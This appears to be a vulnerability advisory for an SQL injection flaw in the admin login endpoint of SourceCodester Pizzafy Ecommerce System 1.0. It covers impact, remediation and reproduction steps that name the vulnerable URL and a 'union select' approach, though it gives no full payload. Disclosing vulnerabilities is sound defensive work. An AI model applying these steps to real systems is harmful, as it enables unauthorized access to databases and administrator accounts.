SourceCodester Pizzafy Ecommerce System SQL Injection Vulnerability

A critical SQL injection vulnerability has been identified in SourceCodester Pizzafy Ecommerce System version 1.0. The issue resides in the login2 function of the admin/ajax.php file, where the e-mail parameter is not properly sanitized. This flaw allows remote attackers to inject malicious SQL commands, exploiting the application’s database query handling. The vulnerability has been publicly disclosed and is unpatched.

Impact

Exploitation of this vulnerability allows attackers to perform error-based SQL injection, with the potential to extract sensitive data such as database names, table names, column structures, usernames, and password hashes. Additionally, attackers could delete or manipulate records, escalate privileges by hijacking session data, and gain administrative access.

Reproduction

To reproduce this vulnerability, send a POST request to '/pizzafy/admin/ajax.php?action=login2' with an injected SQL payload in the 'email' parameter. The payload should exploit the SQL query handling by, for example, using 'union select' to extract database information. The 'password' parameter can be filled with any value, as the injection occurs through the 'email' parameter.

Remediation

The vulnerability can be remediated by using prepared statements to handle SQL queries securely, validating and sanitizing input parameters, restricting database user privileges, monitoring for unusual access patterns, and improving error handling to avoid disclosing database errors that could aid attackers.